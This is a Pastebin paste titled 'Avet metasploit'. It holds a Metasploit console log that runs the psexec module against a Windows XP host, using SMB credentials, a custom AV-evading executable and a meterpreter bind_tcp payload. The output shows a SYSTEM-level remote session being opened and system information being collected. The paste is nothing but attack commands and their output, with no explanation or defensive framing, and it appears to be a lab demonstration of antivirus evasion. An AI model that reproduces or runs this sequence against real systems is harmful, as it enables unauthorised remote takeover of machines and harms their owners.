SHARE
TWEET

Avet metasploit

TVT618 Jan 28th, 2019 1,703 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. msf exploit(psexec) > use exploit/windows/smb/psexec
  2. msf exploit(psexec) > set EXE::custom /root/tools/ave/pwn.exe
  3. EXE::custom => /root/tools/ave/pwn.exe
  4. msf exploit(psexec) > set payload windows/meterpreter/bind_tcp
  5. payload => windows/meterpreter/bind_tcp
  6. msf exploit(psexec) > set rhost 192.168.116.183
  7. rhost => 192.168.116.183
  8. msf exploit(psexec) > set smbuser dax
  9. smbuser => dax
  10. msf exploit(psexec) > set smbpass test123
  11. smbpass => test123
  12. msf exploit(psexec) > set lport 8443
  13. lport => 8443
  14. msf exploit(psexec) > run
  15.  
  16. [*] 192.168.116.183:445 - Connecting to the server...
  17. [*] Started bind handler
  18. [*] 192.168.116.183:445 - Authenticating to 192.168.116.183:445 as user 'dax'...
  19. [*] Sending stage (957487 bytes) to 192.168.116.183
  20. [*] 192.168.116.183:445 - Selecting native target
  21. [*] 192.168.116.183:445 - Uploading payload...
  22. [*] 192.168.116.183:445 - Using custom payload /root/tools/avepoc/a.exe, RHOST and RPORT settings will be ignored!
  23. [*] 192.168.116.183:445 - Created \mzrCIOVg.exe...
  24. [+] 192.168.116.183:445 - Service started successfully...
  25. [*] 192.168.116.183:445 - Deleting \mzrCIOVg.exe...
  26. [-] 192.168.116.183:445 - Delete of \mzrCIOVg.exe failed: The server responded with error: STATUS_CANNOT_DELETE (Command=6 WordCount=0)
  27. [*] Exploit completed, but no session was created.
  28. msf exploit(psexec) > [*] Meterpreter session 4 opened (192.168.116.142:33453 -> 192.168.116.183:8443) at 2017-05-27 18:47:23 +0200
  29.  
  30. msf exploit(psexec) > sessions
  31.  
  32. Active sessions
  33. ===============
  34.  
  35. Id Type Information Connection
  36. -- ---- ----------- ----------
  37. 4 meterpreter x86/windows NT-AUTORIT_T\SYSTEM @ DAX-RYMZ48Z3EYO 192.168.116.142:33453 -> 192.168.116.183:8443 (192.168.116.183)
  38.  
  39. msf exploit(psexec) > sessions -i 4
  40. [*] Starting interaction with 4...
  41.  
  42. meterpreter > sysinfo
  43. Computer : DAX-RYMZ48Z3EYO
  44. OS : Windows XP (Build 2600, Service Pack 3).
  45. Architecture : x86
  46. System Language : de_DE
  47. Domain : ARBEITSGRUPPE
  48. Logged On Users : 2
  49. Meterpreter : x86/windows
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top